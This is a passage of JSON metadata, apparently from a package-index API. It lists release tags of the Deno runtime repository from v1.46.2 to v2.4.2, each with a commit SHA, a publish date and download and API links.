1:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/re